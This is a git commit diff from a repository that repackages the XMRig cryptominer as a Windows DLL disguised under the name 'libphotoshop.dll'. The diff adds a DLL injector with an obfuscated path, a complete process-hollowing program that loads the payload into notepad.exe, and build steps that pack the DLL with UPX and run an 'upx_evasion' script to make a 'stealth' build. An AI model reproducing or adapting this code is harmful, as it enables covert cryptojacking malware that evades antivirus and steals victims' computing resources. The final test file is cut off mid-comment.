jory/xmrig-minimized-dll
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Code can be build now without requiring any external dll's xmrig.cpp has been changed so it can run like Reflective DLL Injection. reflective dll injection not tested

Browse Source
This commit is contained in:
someone 2025-11-27 19:04:35 +01:00
parent 93551f5c0d
commit f5d0d904e4
14 changed files with 1745 additions and 204 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

140
CMakeLists.txt
View File

@ -1,54 +1,51 @@
cmake_minimum_required(VERSION 3.10)
project(photoshop)
option(WITH_HWLOC "Enable hwloc support" ON)
option(WITH_CN_LITE "Enable CryptoNight-Lite algorithms family" ON)
option(WITH_CN_HEAVY "Enable CryptoNight-Heavy algorithms family" ON)
option(WITH_CN_PICO "Enable CryptoNight-Pico algorithm" ON)
option(WITH_CN_FEMTO "Enable CryptoNight-UPX2 algorithm" ON)
option(WITH_RANDOMX "Enable RandomX algorithms family" ON)
option(WITH_ARGON2 "Enable Argon2 algorithms family" ON)
option(WITH_KAWPOW "Enable KawPow algorithms family" ON)
option(WITH_GHOSTRIDER "Enable GhostRider algorithm" ON)
option(WITH_HTTP "Enable HTTP protocol support (client/server)" ON)
option(WITH_DEBUG_LOG "Enable debug log output" OFF)
option(WITH_TLS "Enable OpenSSL support" ON)
option(WITH_ASM "Enable ASM PoW implementations" ON)
option(WITH_MSR "Enable MSR mod & 1st-gen Ryzen fix" ON)
option(WITH_ENV_VARS "Enable environment variables support in config file" OFF)
option(WITH_EMBEDDED_CONFIG "Enable internal embedded JSON config" ON)
option(WITH_OPENCL "Enable OpenCL backend" OFF)
option(WITH_HWLOC "Enable hwloc support" ON)
option(WITH_CN_LITE "Enable CryptoNight-Lite algorithms family" ON)
option(WITH_CN_HEAVY "Enable CryptoNight-Heavy algorithms family" ON)
option(WITH_CN_PICO "Enable CryptoNight-Pico algorithm" ON)
option(WITH_CN_FEMTO "Enable CryptoNight-UPX2 algorithm" ON)
option(WITH_RANDOMX "Enable RandomX algorithms family" ON)
option(WITH_ARGON2 "Enable Argon2 algorithms family" ON)
option(WITH_KAWPOW "Enable KawPow algorithms family" ON)
option(WITH_GHOSTRIDER "Enable GhostRider algorithm" ON)
option(WITH_HTTP "Enable HTTP protocol support (client/server)" ON)
option(WITH_DEBUG_LOG "Enable debug log output" OFF)
option(WITH_TLS "Enable OpenSSL support" ON)
option(WITH_ASM "Enable ASM PoW implementations" ON)
option(WITH_MSR "Enable MSR mod & 1st-gen Ryzen fix" ON)
option(WITH_ENV_VARS "Enable environment variables support in config file" OFF)
option(WITH_EMBEDDED_CONFIG "Enable internal embedded JSON config" ON)
option(WITH_OPENCL "Enable OpenCL backend" OFF)
set(WITH_OPENCL_VERSION 200 CACHE STRING "Target OpenCL version")
set_property(CACHE WITH_OPENCL_VERSION PROPERTY STRINGS 120 200 210 220)
option(WITH_CUDA "Enable CUDA backend" OFF)
option(WITH_NVML "Enable NVML (NVIDIA Management Library) support (only if CUDA backend enabled)" OFF)
option(WITH_ADL "Enable ADL (AMD Display Library) or sysfs support (only if OpenCL backend enabled)" OFF)
option(WITH_STRICT_CACHE "Enable strict checks for OpenCL cache" ON)
option(WITH_CUDA "Enable CUDA backend" OFF)
option(WITH_NVML "Enable NVML (NVIDIA Management Library) support (only if CUDA backend enabled)" OFF)
option(WITH_ADL "Enable ADL (AMD Display Library) or sysfs support (only if OpenCL backend enabled)" OFF)
option(WITH_STRICT_CACHE "Enable strict checks for OpenCL cache" ON)
option(WITH_INTERLEAVE_DEBUG_LOG "Enable debug log for threads interleave" OFF)
option(WITH_PROFILING "Enable profiling for developers" OFF)
option(WITH_SSE4_1 "Enable SSE 4.1 for Blake2" ON)
option(WITH_AVX2 "Enable AVX2 for Blake2" ON)
option(WITH_VAES "Enable VAES instructions for Cryptonight" ON)
option(WITH_BENCHMARK "Enable builtin RandomX benchmark and stress test" OFF)
option(WITH_SECURE_JIT "Enable secure access to JIT memory" OFF)
option(WITH_DMI "Enable DMI/SMBIOS reader" ON)
option(BUILD_STATIC "Build static binary" OFF)
option(ARM_V8 "Force ARMv8 (64 bit) architecture, use with caution if automatic detection fails, but you sure it may work" OFF)
option(ARM_V7 "Force ARMv7 (32 bit) architecture, use with caution if automatic detection fails, but you sure it may work" OFF)
option(HWLOC_DEBUG "Enable hwloc debug helpers and log" OFF)
option(WITH_PROFILING "Enable profiling for developers" OFF)
option(WITH_SSE4_1 "Enable SSE 4.1 for Blake2" ON)
option(WITH_AVX2 "Enable AVX2 for Blake2" ON)
option(WITH_VAES "Enable VAES instructions for Cryptonight" ON)
option(WITH_BENCHMARK "Enable builtin RandomX benchmark and stress test" OFF)
option(WITH_SECURE_JIT "Enable secure access to JIT memory" OFF)
option(WITH_DMI "Enable DMI/SMBIOS reader" ON)
option(BUILD_STATIC "Build static binary" OFF)
option(ARM_V8 "Force ARMv8 (64 bit) architecture, use with caution if automatic detection fails, but you sure it may work" OFF)
option(ARM_V7 "Force ARMv7 (32 bit) architecture, use with caution if automatic detection fails, but you sure it may work" OFF)
option(HWLOC_DEBUG "Enable hwloc debug helpers and log" OFF)
set(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} "${CMAKE_SOURCE_DIR}/cmake")
include (CheckIncludeFile)
include (cmake/cpu.cmake)
include (cmake/os.cmake)
include (src/base/base.cmake)
include (src/backend/backend.cmake)
set(HEADERS
"${HEADERS_BASE}"
"${HEADERS_BASE_HTTP}"
@ -58,7 +55,7 @@ set(HEADERS
#src/core/config/Config_platform.h
src/core/config/Config.h
#src/core/config/ConfigTransform.h
#src/core/config/usage.h
# src/core/config/usage.h <-- REMOVED
src/core/Controller.h
src/core/Miner.h
src/core/Taskbar.h
@ -148,7 +145,6 @@ if (WITH_HWLOC)
list(APPEND HEADERS_CRYPTO
src/crypto/common/NUMAMemoryPool.h
)
list(APPEND SOURCES_CRYPTO
src/crypto/common/NUMAMemoryPool.cpp
src/crypto/common/VirtualMemory_hwloc.cpp
@ -157,18 +153,16 @@ endif()
if (XMRIG_OS_WIN)
list(APPEND SOURCES_OS
res/app.rc
# res/app.rc <-- REMOVED
src/App_win.cpp
src/crypto/common/VirtualMemory_win.cpp
)
set(EXTRA_LIBS ws2_32 psapi iphlpapi userenv dbghelp)
set(EXTRA_LIBS ws2_32 psapi iphlpapi userenv dbghelp crypt32)
elseif (XMRIG_OS_APPLE)
list(APPEND SOURCES_OS
src/App_unix.cpp
src/crypto/common/VirtualMemory_unix.cpp
)
find_library(IOKIT_LIBRARY IOKit)
find_library(CORESERVICES_LIBRARY CoreServices)
set(EXTRA_LIBS ${IOKIT_LIBRARY} ${CORESERVICES_LIBRARY})
@ -177,7 +171,6 @@ else()
src/App_unix.cpp
src/crypto/common/VirtualMemory_unix.cpp
)
if (XMRIG_OS_ANDROID)
set(EXTRA_LIBS pthread rt dl log)
elseif (XMRIG_OS_LINUX)
@ -185,7 +178,6 @@ else()
src/crypto/common/LinuxMemory.h
src/crypto/common/LinuxMemory.cpp
)
set(EXTRA_LIBS pthread rt dl)
elseif (XMRIG_OS_FREEBSD)
set(EXTRA_LIBS kvm pthread)
@ -205,38 +197,18 @@ include(cmake/ghostrider.cmake)
include(cmake/OpenSSL.cmake)
include(cmake/asm.cmake)
# OpenCL dynamic compilation
#find_package(OpenCL)
#if (OPENCL_FOUND)
# add_definitions(/DXMRIG_FEATURE_OPENCL /DCL_USE_DEPRECATED_OPENCL_1_2_APIS)
# include(src/backend/opencl/opencl.cmake)
# target_link_libraries(${CMAKE_PROJECT_NAME} ${OPENCL_LIBRARIES})
#endif()
# CUDA dynamic compilation
#find_package(CUDA)
#if (CUDA_FOUND)
# add_definitions(/DXMRIG_FEATURE_CUDA)
# include(src/backend/cuda/cuda.cmake)
# target_link_libraries(${CMAKE_PROJECT_NAME} ${CUDA_LIBRARIES})
#endif()
if (WITH_CN_LITE)
add_definitions(/DXMRIG_ALGO_CN_LITE)
endif()
if (WITH_CN_HEAVY)
add_definitions(/DXMRIG_ALGO_CN_HEAVY)
endif()
if (WITH_CN_PICO)
add_definitions(/DXMRIG_ALGO_CN_PICO)
endif()
if (WITH_CN_FEMTO)
add_definitions(/DXMRIG_ALGO_CN_FEMTO)
endif()
if (WITH_EMBEDDED_CONFIG)
add_definitions(/DXMRIG_FEATURE_EMBEDDED_CONFIG)
endif()
@ -253,28 +225,44 @@ if (WITH_DEBUG_LOG)
endif()
add_library(${CMAKE_PROJECT_NAME} SHARED ${HEADERS} ${SOURCES} ${SOURCES_OS} ${HEADERS_CRYPTO} ${SOURCES_CRYPTO} ${SOURCES_SYSLOG} ${TLS_SOURCES} ${XMRIG_ASM_SOURCES})
add_executable(injector ./dll_injector.cpp)
#add_executable(${CMAKE_PROJECT_NAME} ${HEADERS} ${SOURCES} ${SOURCES_OS} ${HEADERS_CRYPTO} ${SOURCES_CRYPTO} ${SOURCES_SYSLOG} ${TLS_SOURCES} ${XMRIG_ASM_SOURCES})
target_link_libraries(${CMAKE_PROJECT_NAME} ${XMRIG_ASM_LIBRARY} ${OPENSSL_LIBRARIES} ${UV_LIBRARIES} ${EXTRA_LIBS} ${CPUID_LIB} ${ARGON2_LIBRARY} ${ETHASH_LIBRARY} ${GHOSTRIDER_LIBRARY} pthread)
target_link_libraries(injector psapi ntdll)
target_link_options(${CMAKE_PROJECT_NAME} PRIVATE -static-libgcc -static-libstdc++ -static)
# --- FIXED LINKING BLOCK ---
if (WIN32)
target_link_options(${CMAKE_PROJECT_NAME} PRIVATE -mwindows)
target_link_libraries(${CMAKE_PROJECT_NAME}
# 1. Static Libraries
${XMRIG_ASM_LIBRARY}
${OPENSSL_LIBRARIES}
${UV_LIBRARIES}
${CPUID_LIB}
${ARGON2_LIBRARY}
${ETHASH_LIBRARY}
${GHOSTRIDER_LIBRARY}
# 2. Force Static Runtimes (Flags)
-static-libgcc
-static-libstdc++
-Wl,-Bstatic
# 3. Force Static Pthreads (Whole Archive)
-Wl,--whole-archive -lwinpthread -Wl,--no-whole-archive
# 4. Force MSVCRT
-lmsvcrt
# 5. System Libraries (Dynamic)
-Wl,-Bdynamic
${EXTRA_LIBS}
)
else()
target_link_libraries(${CMAKE_PROJECT_NAME} ${XMRIG_ASM_LIBRARY} ${OPENSSL_LIBRARIES} ${UV_LIBRARIES} ${EXTRA_LIBS} ${CPUID_LIB} ${ARGON2_LIBRARY} ${ETHASH_LIBRARY} ${GHOSTRIDER_LIBRARY})
endif()
# ---------------------------
if (WIN32)
if (NOT ARM_TARGET)
add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/bin/WinRing0/WinRing0x64.sys" $<TARGET_FILE_DIR:${CMAKE_PROJECT_NAME}>)
endif()
#add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/benchmark_1M.cmd" $<TARGET_FILE_DIR:${CMAKE_PROJECT_NAME}>)
#add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/benchmark_10M.cmd" $<TARGET_FILE_DIR:${CMAKE_PROJECT_NAME}>)
#add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/pool_mine_example.cmd" $<TARGET_FILE_DIR:${CMAKE_PROJECT_NAME}>)
#add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/solo_mine_example.cmd" $<TARGET_FILE_DIR:${CMAKE_PROJECT_NAME}>)
#add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/rtm_ghostrider_example.cmd" $<TARGET_FILE_DIR:${CMAKE_PROJECT_NAME}>)
endif()
set(CMAKE_CXX_FLAGS_RELEASE "${CMAKE_CXX_FLAGS_RELEASE} -s")
if (CMAKE_CXX_COMPILER_ID MATCHES Clang AND CMAKE_BUILD_TYPE STREQUAL Release AND NOT CMAKE_GENERATOR STREQUAL Xcode)
add_custom_command(TARGET ${PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_STRIP} "$<TARGET_FILE:${CMAKE_PROJECT_NAME}>")
endif()

1003
ai_prompt Normal file
View File

File diff suppressed because it is too large Load Diff

80
build_cmd Normal file
View File

@ -0,0 +1,80 @@
cmake -G Ninja .. \
-DCMAKE_BUILD_TYPE=Release \
-DCMAKE_SYSTEM_NAME=Windows \
-DCMAKE_C_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang \
-DCMAKE_CXX_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang++ \
-DCMAKE_RC_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-windres \
-DXMRIG_DEPS=$HOME/xmrig-deps/gcc/x64 \
-DCMAKE_FIND_LIBRARY_SUFFIXES=".a" \
-DWITH_TLS=ON \
-DWITH_EMBEDDED_CONFIG=ON \
-DCMAKE_C_FLAGS="-static -fPIC -mtune=generic -fno-lto -Wno-unused-command-line-argument -D_WIN32_WINNT=0x0601 -D__USE_MINGW_ANSI_STDIO=0" \
-DCMAKE_CXX_FLAGS="-static -fPIC -mtune=generic -fno-lto -Wno-unused-command-line-argument -D_WIN32_WINNT=0x0601 -D__USE_MINGW_ANSI_STDIO=0" \
-DCMAKE_SHARED_LINKER_FLAGS="-static -Wl,-Bstatic -Wl,--whole-archive -lwinpthread -Wl,--no-whole-archive -Wl,--allow-multiple-definition -Wl,--start-group -lmingw32 -lmingwex -lmsvcrt -lkernel32 -luser32 -ladvapi32 -lws2_32 -lpsapi -liphlpapi -luserenv -ldbghelp -lssp -lstdc++ -lstdc++fs -Wl,-lmsvcrt -Wl,-lmingwex -Wl,-lmingw32 -Wl,-lwinpthread -Wl,-lmsvcrt -Wl,-lkernel32 -Wl,-luser32 -Wl,-ladvapi32 -Wl,-lws2_32 -Wl,-lpsapi -Wl,-liphlpapi -Wl,-luserenv -Wl,-ldbghelp -Wl,-lssp -Wl,--end-group" \
-DCMAKE_EXE_LINKER_FLAGS="-static -Wl,-Bstatic -Wl,--whole-archive -lwinpthread -Wl,--no-whole-archive -Wl,--allow-multiple-definition"
ninja -j10
upx --best --lzma libphotoshop.dll -o libphotoshop_packed.dll
python3 ../upx_evasion.py libphotoshop_packed.dll -o libphotoshop_stealth.dll --keep-relocs
&& x86_64-w64-mingw32-g++ -o test_xmrig.exe ../test_xmrig.cpp libphotoshop.dll
OR for gcc use
cmake .. -G "Unix Makefiles" -DCMAKE_BUILD_TYPE=Release -DCMAKE_C_COMPILER=x86_64-w64-mingw32-gcc -DCMAKE_CXX_COMPILER=x86_64-w64-mingw32-g++ -DWITH_TLS=ON -DXMRIG_DEPS=$HOME/xmrig-deps/gcc/x64 -DCMAKE_SYSTEM_NAME=Windows -DCMAKE_SYSTEM_PROCESSOR=x86_64 -DWITH_EMBEDDED_CONFIG=ON && make -j $(nproc)
OR for CREATING ONE EXE WITHOUT DEPENDENCIES
 cmake -G Ninja .. \
-DCMAKE_BUILD_TYPE=Release \
-DCMAKE_SYSTEM_NAME=Windows \
-DCMAKE_C_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang \
-DCMAKE_CXX_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang++ \
-DCMAKE_RC_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-windres \
-DXMRIG_DEPS=$HOME/xmrig-deps/gcc/x64 \
-DWITH_TLS=ON \
-DWITH_EMBEDDED_CONFIG=ON
ninja -j10
 x86_64-w64-mingw32-g++ -o test_xmrig.exe ../test_xmrig.cpp libphotoshop.a \
-static -static-libgcc -static-libstdc++ \
$HOME/xmrig-deps/gcc/x64/lib/libssl.a \
$HOME/xmrig-deps/gcc/x64/lib/libcrypto.a \
$HOME/xmrig-deps/gcc/x64/lib/libuv.a \
$HOME/xmrig-deps/gcc/x64/lib/libhwloc.a \
-lpthread -lws2_32 -liphlpapi -lpsapi -luserenv -ldbghelp
cmake -G Ninja .. \
-DCMAKE_BUILD_TYPE=Release \
-DCMAKE_SYSTEM_NAME=Windows \
-DCMAKE_C_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang \
-DCMAKE_CXX_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang++ \
-DCMAKE_RC_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-windres \
-DXMRIG_DEPS=$HOME/xmrig-deps/gcc/x64 \
-DWITH_TLS=ON \
-DWITH_EMBEDDED_CONFIG=ON \
-DCMAKE_C_FLAGS="-fPIC -mtune=generic -fno-lto -D_WIN32_WINNT=0x0601" \
-DCMAKE_CXX_FLAGS="-fPIC -mtune=generic -fno-lto -D_WIN32_WINNT=0x0601" && \
ninja -j (math (nproc) - 2) && \
/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang++ \
-o test_xmrig.exe \
../test_xmrig.cpp \
-L. libphotoshop.dll \
-static \
-static-libgcc \
-static-libstdc++ \
-Wl,--whole-archive -lwinpthread -Wl,--no-whole-archive \
-lmsvcrt
upx --best --lzma libphotoshop.dll -o libphotoshop_packed.dll
python3 ../upx_evasion.py libphotoshop_packed.dll -o libphotoshop_stealth.dll --keep-relocs

6
cmake_overrides/FindHWLOC.cmake Normal file
View File

@ -0,0 +1,6 @@
find_path(HWLOC_INCLUDE_DIR NAMES hwloc.h PATHS "${XMRIG_DEPS}/include" NO_DEFAULT_PATH)
find_library(HWLOC_LIBRARY NAMES libhwloc.a hwloc PATHS "${XMRIG_DEPS}/lib" NO_DEFAULT_PATH)
set(HWLOC_LIBRARIES ${HWLOC_LIBRARY})
set(HWLOC_INCLUDE_DIRS ${HWLOC_INCLUDE_DIR})
include(FindPackageHandleStandardArgs)
find_package_handle_standard_args(HWLOC DEFAULT_MSG HWLOC_LIBRARY HWLOC_INCLUDE_DIR)

6
cmake_overrides/FindUV.cmake Normal file
View File

@ -0,0 +1,6 @@
find_path(UV_INCLUDE_DIR NAMES uv.h PATHS "${XMRIG_DEPS}/include" NO_DEFAULT_PATH)
find_library(UV_LIBRARY NAMES libuv.a uv PATHS "${XMRIG_DEPS}/lib" NO_DEFAULT_PATH)
set(UV_LIBRARIES ${UV_LIBRARY})
set(UV_INCLUDE_DIRS ${UV_INCLUDE_DIR})
include(FindPackageHandleStandardArgs)
find_package_handle_standard_args(UV DEFAULT_MSG UV_LIBRARY UV_INCLUDE_DIR)

46
cmake_overrides/OpenSSL.cmake Normal file
View File

@ -0,0 +1,46 @@
if (WITH_TLS)
find_path(OPENSSL_INCLUDE_DIR NAMES openssl/ssl.h PATHS "${XMRIG_DEPS}/include" NO_DEFAULT_PATH)
find_library(OPENSSL_CRYPTO_LIBRARY NAMES libcrypto.a crypto PATHS "${XMRIG_DEPS}/lib" NO_DEFAULT_PATH)
find_library(OPENSSL_SSL_LIBRARY NAMES libssl.a ssl PATHS "${XMRIG_DEPS}/lib" NO_DEFAULT_PATH)
set(OPENSSL_LIBRARIES ${OPENSSL_SSL_LIBRARY} ${OPENSSL_CRYPTO_LIBRARY})
set(OPENSSL_INCLUDE_DIRS ${OPENSSL_INCLUDE_DIR})
include(FindPackageHandleStandardArgs)
find_package_handle_standard_args(OpenSSL DEFAULT_MSG OPENSSL_LIBRARIES OPENSSL_INCLUDE_DIR)
if (OPENSSL_FOUND)
set(TLS_SOURCES
src/base/net/stratum/Tls.cpp
src/base/net/stratum/Tls.h
src/base/net/tls/ServerTls.cpp
src/base/net/tls/ServerTls.h
src/base/net/tls/TlsConfig.cpp
src/base/net/tls/TlsConfig.h
src/base/net/tls/TlsContext.cpp
src/base/net/tls/TlsContext.h
src/base/net/tls/TlsGen.cpp
src/base/net/tls/TlsGen.h
)
include_directories(${OPENSSL_INCLUDE_DIR})
if (WITH_HTTP)
set(TLS_SOURCES ${TLS_SOURCES}
src/base/net/https/HttpsClient.cpp
src/base/net/https/HttpsClient.h
src/base/net/https/HttpsContext.cpp
src/base/net/https/HttpsContext.h
src/base/net/https/HttpsServer.cpp
src/base/net/https/HttpsServer.h
)
endif()
add_definitions(-DXMRIG_FEATURE_TLS)
else()
message(FATAL_ERROR "OpenSSL NOT found: use `-DWITH_TLS=OFF` to build without TLS support")
endif()
else()
set(TLS_SOURCES "")
set(OPENSSL_LIBRARIES "")
remove_definitions(-DXMRIG_FEATURE_TLS)
endif()

4
dll_injectorWORKING.cpp
View File

@ -145,7 +145,7 @@ bool InjectDLL(DWORD pid, const std::string& dllPathObf) {
// Step 4: Wait for module list update, then get remote DLL base
Sleep(2000); // 2s delay for explorer to register module
HMODULE hRemoteDll = GetRemoteModuleBase(hProcess, "libxmrig-notls.dll");
HMODULE hRemoteDll = GetRemoteModuleBase(hProcess, "libphotoshop.dll");
if (!hRemoteDll) {
std::cerr << "GetRemoteModuleBase failed - DLL not loaded? Check LoadLibrary exit code above.\n";
CloseHandle(hProcess);
@ -166,7 +166,7 @@ int main() {
return 1;
}
std::string dllPathPlain = "C:\\Users\\MyWindowsUser\\Downloads\\test_on_windows\\libxmrig-notls.dll";
std::string dllPathPlain = "C:\\Users\\MyWindowsUser\\Downloads\\no_AV_here\\libphotoshop.dll";
std::string dllPathObf = XORObfuscate(dllPathPlain);
if (InjectDLL(pid, dllPathObf)) {

118
inject_and_hollow.cpp Normal file
View File

@ -0,0 +1,118 @@
#include <windows.h>
#include <winternl.h>
#include <iostream>
#include <vector>
#include <string>
typedef NTSTATUS(NTAPI* pNtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
typedef NTSTATUS(NTAPI* pNtQueryInformationProcess)(HANDLE ProcessHandle, PROCESSINFOCLASS ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength);
int main() {
// Path to the legitimate process to hollow (e.g., a benign system exe)
const char* targetPath = "C:\\Windows\\System32\\notepad.exe"; // Or explorer.exe
// Path to your malicious PE executable (the payload to inject as the new image)
const char* payloadPath = "C:\\Users\\MyWindowsUser\\Downloads\\no_AV_here\\libphotoshop.dll"; // Replace with your xmrig.exe or equivalent PE
STARTUPINFOA si = { sizeof(si) };
PROCESS_INFORMATION pi = { 0 };
// Step 1: Create suspended process
BOOL created = CreateProcessA(NULL, (LPSTR)targetPath, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
if (!created) {
std::cerr << "CreateProcessA failed: " << GetLastError() << std::endl;
return 1;
}
// Step 2: Get PEB and image base
PROCESS_BASIC_INFORMATION pbi;
ULONG returnLength;
pNtQueryInformationProcess NtQuery = (pNtQueryInformationProcess)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryInformationProcess");
NTSTATUS status = NtQuery(pi.hProcess, ProcessBasicInformation, &pbi, sizeof(pbi), &returnLength);
if (status != 0) {
std::cerr << "NtQueryInformationProcess failed: " << status << std::endl;
ResumeThread(pi.hThread); CloseHandle(pi.hProcess); CloseHandle(pi.hThread);
return 1;
}
PVOID imageBase;
PVOID pebImageBasePtr = (PVOID)((BYTE*)pbi.PebBaseAddress + 0x10); // Offset for ImageBaseAddress in x64 PEB
if (!ReadProcessMemory(pi.hProcess, pebImageBasePtr, &imageBase, sizeof(imageBase), NULL)) {
std::cerr << "ReadProcessMemory (ImageBase) failed: " << GetLastError() << std::endl;
ResumeThread(pi.hThread); CloseHandle(pi.hProcess); CloseHandle(pi.hThread);
return 1;
}
// Step 3: Unmap original image
pNtUnmapViewOfSection NtUnmap = (pNtUnmapViewOfSection)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtUnmapViewOfSection");
status = NtUnmap(pi.hProcess, imageBase);
if (status != 0) {
std::cerr << "NtUnmapViewOfSection failed: " << status << std::endl;
ResumeThread(pi.hThread); CloseHandle(pi.hProcess); CloseHandle(pi.hThread);
return 1;
}
// Step 4: Read payload PE from disk
HANDLE hFile = CreateFileA(payloadPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
std::cerr << "CreateFile (payload) failed: " << GetLastError() << std::endl;
ResumeThread(pi.hThread); CloseHandle(pi.hProcess); CloseHandle(pi.hThread);
return 1;
}
DWORD payloadSize = GetFileSize(hFile, NULL);
std::vector<BYTE> payload(payloadSize);
ReadFile(hFile, payload.data(), payloadSize, NULL, NULL);
CloseHandle(hFile);
// Parse payload headers
PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)payload.data();
PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)(payload.data() + dosHeader->e_lfanew);
PVOID payloadImageBase = (PVOID)ntHeader->OptionalHeader.ImageBase;
SIZE_T payloadImageSize = ntHeader->OptionalHeader.SizeOfImage;
// Step 5: Allocate memory in target process (prefer payload's base, but fallback if occupied)
PVOID newImageBase = VirtualAllocEx(pi.hProcess, payloadImageBase, payloadImageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!newImageBase) {
newImageBase = VirtualAllocEx(pi.hProcess, NULL, payloadImageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!newImageBase) {
std::cerr << "VirtualAllocEx failed: " << GetLastError() << std::endl;
ResumeThread(pi.hThread); CloseHandle(pi.hProcess); CloseHandle(pi.hThread);
return 1;
}
}
// Step 6: Write headers and sections
WriteProcessMemory(pi.hProcess, newImageBase, payload.data(), ntHeader->OptionalHeader.SizeOfHeaders, NULL);
PIMAGE_SECTION_HEADER sectionHeader = IMAGE_FIRST_SECTION(ntHeader);
for (WORD i = 0; i < ntHeader->FileHeader.NumberOfSections; i++) {
PVOID sectionDest = (PVOID)((SIZE_T)newImageBase + sectionHeader->VirtualAddress);
PVOID sectionSrc = (PVOID)(payload.data() + sectionHeader->PointerToRawData);
WriteProcessMemory(pi.hProcess, sectionDest, sectionSrc, sectionHeader->SizeOfRawData, NULL);
sectionHeader++;
}
// Step 7: Handle relocations if base changed
if (newImageBase != payloadImageBase) {
PIMAGE_DATA_DIRECTORY relocDir = &ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
if (relocDir->VirtualAddress) {
PIMAGE_BASE_RELOCATION reloc = (PIMAGE_BASE_RELOCATION)((SIZE_T)newImageBase + relocDir->VirtualAddress);
SIZE_T delta = (SIZE_T)newImageBase - (SIZE_T)payloadImageBase;
while (reloc->VirtualAddress) {
PWORD entry = (PWORD)((SIZE_T)reloc + sizeof(IMAGE_BASE_RELOCATION));
for (DWORD j = 0; j < (reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD); j++, entry++) {
if ((*entry >> 12) == IMAGE_REL_BASED_DIR64) {
PULONG64 ptr = (PULONG64)((SIZE_T)newImageBase + reloc->VirtualAddress + (*entry & 0xFFF));
ULONG64 oldValue = 0;
ReadProcessMemory(pi.hProcess, ptr, &oldValue, sizeof(ULONG64), NULL);
oldValue += delta;
WriteProcessMemory(pi.hProcess, ptr, &oldValue, sizeof(ULONG64), NULL);
}
}
reloc = (PIMAGE_BASE_RELOCATION)((SIZE_T)reloc + reloc->SizeOfBlock);
}
}
}
// Step 8: Update PEB image base
WriteProcessMemory(pi.hProcess, pebImageBasePtr, &newImageBase, sizeof(newImageBase), NULL);
// Step 9: Update thread context with new entry point
CONTEXT ctx = { 0 };
ctx.ContextFlags = CONTEXT_FULL;
GetThreadContext(pi.hThread, &ctx);
ctx.Rcx = (DWORD64)newImageBase + ntHeader->OptionalHeader.AddressOfEntryPoint; // Entry point in RCX for x64
SetThreadContext(pi.hThread, &ctx);
// Step 10: Resume thread
ResumeThread(pi.hThread);
std::cout << "Process hollowed and payload injected into PID " << pi.dwProcessId << std::endl;
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
return 0;
}

51
rditest.cpp Normal file
View File

@ -0,0 +1,51 @@
#include <windows.h>
#include <iostream>
#include <string>
// Function pointer type for the exported RdiEntry function
typedef DWORD (WINAPI *RDI_ENTRY_FUNC)(LPVOID);
int main() {
// --- 1. Define DLL Name ---
const std::string dllName = "libphotoshop.dll";
// --- 2. Load the DLL (Emulates part of the injection process) ---
std::cout << "[Tester] Attempting to LoadLibrary: " << dllName << std::endl;
HMODULE hDll = LoadLibraryA(dllName.c_str());
if (!hDll) {
std::cerr << "[ERROR] Could not load DLL. GetLastError: " << GetLastError() << std::endl;
return 1;
}
// --- 3. Get the RDI Entry Point Address ---
const std::string entryFuncName = "RdiEntry";
std::cout << "[Tester] Looking up exported function: " << entryFuncName << std::endl;
RDI_ENTRY_FUNC RdiEntry = (RDI_ENTRY_FUNC)GetProcAddress(hDll, entryFuncName.c_str());
if (!RdiEntry) {
std::cerr << "[ERROR] Could not find RdiEntry function. Check export list." << std::endl;
FreeLibrary(hDll);
return 1;
}
// --- 4. Execute the Payload Entry Point ---
std::cout << "[Tester] Calling RdiEntry payload function..." << std::endl;
DWORD dwResult = RdiEntry(NULL); // Execute the mining payload logic
std::cout << "[Tester] RdiEntry returned: " << dwResult << std::endl;
std::cout << "[Tester] Execution initiated. Check Task Manager for CPU spike." << std::endl;
// NOTE: If the payload enters an infinite loop (like xmrig often does),
// the tester will hang here. This confirms execution.
// If the payload successfully threads itself and returns immediately,
